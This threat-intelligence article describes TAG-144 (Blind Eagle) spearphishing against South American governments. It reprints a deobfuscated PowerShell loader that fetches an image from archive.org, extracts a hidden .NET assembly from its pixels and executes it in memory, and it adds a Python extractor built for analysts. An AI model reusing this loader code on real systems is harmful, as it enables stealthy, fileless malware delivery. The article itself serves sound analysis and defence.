Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.
First observed in 2018, this group relies on an array of commodity remote access trojans (RATs) such as AsyncRAT, Remcos RAT, and XWorm, usually delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.
In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters standing up new infrastructure and abusing legitimate internet services to stage malware payloads.
Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.
These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.
Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.
The impact of TAG-144's campaigns has been most severe in Colombia's national and municipal agencies, where the theft of credentials and sensitive data creates both espionage and financial extortion risks.
Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.
Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144's more sophisticated techniques hides a Base64-encoded .NET assembly in image pixel data: the loader downloads a benign-looking JPEG hosted on Archive[.]org, locates a predefined byte marker inside the file, and hands everything after the marker to System.Drawing.Bitmap, so the RGB channel values of that embedded image, not the visible JPEG, carry the payload.
Once the initial PowerShell script runs, the loader walks the image pixel by pixel, treats the first four recovered bytes as a length prefix, Base64-decodes the text that follows, and loads the resulting assembly with Reflection.Assembly.Load before invoking its entry point, all in memory. No executable is written to disk, which sidesteps file-based antivirus scanning, although the script block itself remains visible to PowerShell script block logging and the reflective load to AMSI on current .NET Framework versions.
For example, the deobfuscated PowerShell segment responsible for this process appears as:
# Deobfuscated loader (variable names as recovered); the marker bytes are not reproduced in the report, so $marker is a placeholder.
Add-Type -AssemblyName System.Drawing
$tormodont = "https://archive.org/download/universe-.../universe.jpg"
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent','Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes (everything after the marker)
$marker = [byte[]]@( <# predefined marker bytes, not given in the report #> )
$markerIndex = -1
for ($i = 0; $i -le $sorority.Length - $marker.Length; $i++) {
    $match = $true
    for ($j = 0; $j -lt $marker.Length; $j++) {
        if ($sorority[$i + $j] -ne $marker[$j]) { $match = $false; break }
    }
    if ($match) { $markerIndex = $i + $marker.Length; break }
}
if ($markerIndex -lt 0) { throw 'marker not found in downloaded image' }
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$stream.Position = 0   # rewind so Bitmap reads from the start of the carved bytes
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data: R, G, B of each pixel, row by row
$bytesList = New-Object 'Collections.Generic.List[byte]'
foreach ($y in 0..($bitmap.Height-1)) {
    foreach ($x in 0..($bitmap.Width-1)) {
        $color = $bitmap.GetPixel($x,$y)
        $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
    }
}
# First four bytes give the length of the Base64 text that follows
$raw = $bytesList.ToArray()
$length = [BitConverter]::ToInt32($raw, 0)
$payloadBytes = [Convert]::FromBase64String([Text.Encoding]::UTF8.GetString($raw, 4, $length))
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null, [object[]]@($args))
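For analysts who capture the image but never see the loader run, the same extraction steps can be replayed offline. The following Python is an added example, not code from the Recorded Future report or from the loader: it carves everything after a marker, walks the carrier's pixels in the same row-major R, G, B order that GetPixel produces, honours the four-byte length prefix, Base64-decodes the result and sanity-checks it for a PE header. The marker value, the use of an uncompressed 24-bit BMP as the carved carrier (chosen so no image library is needed; the loader's System.Drawing.Bitmap call accepts any format .NET can decode), and the sample blob with its MZ/PE stand-in are all constructed here and are not taken from TAG-144 samples.

```python
"""Carve and decode a TAG-144-style image-borne payload (added example, not the loader's code)."""
import base64
import struct

# Assumption: the real marker bytes are not reproduced in the report; this value is invented.
MARKER = b"<<TAG144-DEMO-MARKER>>"


def write_bmp24(width, height, rows):
    """Build an uncompressed 24-bit BMP from top-to-bottom rows of (r, g, b) tuples."""
    row_size = (width * 3 + 3) // 4 * 4          # BMP pads each row to 4 bytes
    pixels = bytearray()
    for row in reversed(rows):                   # BMP stores rows bottom-up, BGR order
        for r, g, b in row:
            pixels += bytes((b, g, r))
        pixels += b"\x00" * (row_size - width * 3)
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(pixels), 0, 0, 54)
    dib_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                          len(pixels), 2835, 2835, 0, 0)
    return file_hdr + dib_hdr + bytes(pixels)


def read_bmp24_channels(data):
    """Return R,G,B bytes of every pixel, row-major top-to-bottom, as the loader's GetPixel loop yields them."""
    magic, _, _, _, offset = struct.unpack_from("<2sIHHI", data, 0)
    _, width, height, _, bpp, compression = struct.unpack_from("<IiiHHI", data, 14)
    if magic != b"BM" or bpp != 24 or compression != 0 or height <= 0:
        raise ValueError("carrier is not an uncompressed bottom-up 24-bit BMP")
    row_size = (width * 3 + 3) // 4 * 4
    channels = bytearray()
    for y in range(height):
        row_start = offset + (height - 1 - y) * row_size
        for x in range(width):
            b, g, r = data[row_start + x * 3: row_start + x * 3 + 3]
            channels += bytes((r, g, b))
    return bytes(channels)


def embed_payload(payload, width=32):
    """Mirror the loader's layout: 4-byte little-endian length, then Base64 text, across RGB channels."""
    b64 = base64.b64encode(payload)
    stream = struct.pack("<i", len(b64)) + b64
    npix = -(-len(stream) // 3)                  # ceil: one pixel carries three bytes
    height = -(-npix // width)
    stream += b"\x00" * (width * height * 3 - len(stream))  # zero-fill the last row
    rows = [[tuple(stream[(y * width + x) * 3:(y * width + x) * 3 + 3])
             for x in range(width)] for y in range(height)]
    return write_bmp24(width, height, rows)


def carve_after_marker(blob, marker):
    """Everything after the first occurrence of the marker, as the loader's index slice does."""
    idx = blob.find(marker)
    if idx < 0:
        raise ValueError("marker not found in blob")
    return blob[idx + len(marker):]


def extract_payload(blob, marker=MARKER):
    """Replay the loader: carve, walk pixels, read the length prefix, Base64-decode."""
    channels = read_bmp24_channels(carve_after_marker(blob, marker))
    (length,) = struct.unpack_from("<i", channels, 0)
    if length <= 0 or 4 + length > len(channels):
        raise ValueError(f"implausible length prefix {length}")
    return base64.b64decode(channels[4:4 + length], validate=True)


def looks_like_pe(payload):
    """Cheap triage check: MZ header plus a PE signature at e_lfanew."""
    if len(payload) < 0x40 or payload[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", payload, 0x3C)
    return payload[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_assembly():
    """Constructed stand-in for the .NET assembly: an MZ/PE skeleton, not a runnable binary."""
    img = bytearray(0x100)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)      # e_lfanew -> PE signature offset
    img[0x80:0x84] = b"PE\x00\x00"
    return bytes(img)


def build_sample_blob(payload):
    """Constructed download: a JFIF-looking prefix, the marker, then the stego carrier."""
    fake_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64 + b"\xff\xd9"
    return fake_jpeg + MARKER + embed_payload(payload)


if __name__ == "__main__":
    recovered = extract_payload(build_sample_blob(build_fake_assembly()))
    print(f"recovered {len(recovered)} bytes, PE header present: {looks_like_pe(recovered)}")
```

Running the file builds the constructed sample and recovers the stand-in payload. To use it on a real capture, replace the marker with the one recovered from the deobfuscated script and, if the carved carrier is not a BMP, swap `read_bmp24_channels` for a decoder of that format that preserves the same row-major R, G, B order. A length prefix that is negative or runs past the channel data is rejected rather than handed to the Base64 decoder, which is the failure mode a truncated or re-encoded download produces.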
This in-memory loading, combined with dynamic DNS providers such as duckdns.org and noip.com for command-and-control, lets the operators re-point C2 hostnames at will and makes the infrastructure harder to block or trace.
By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.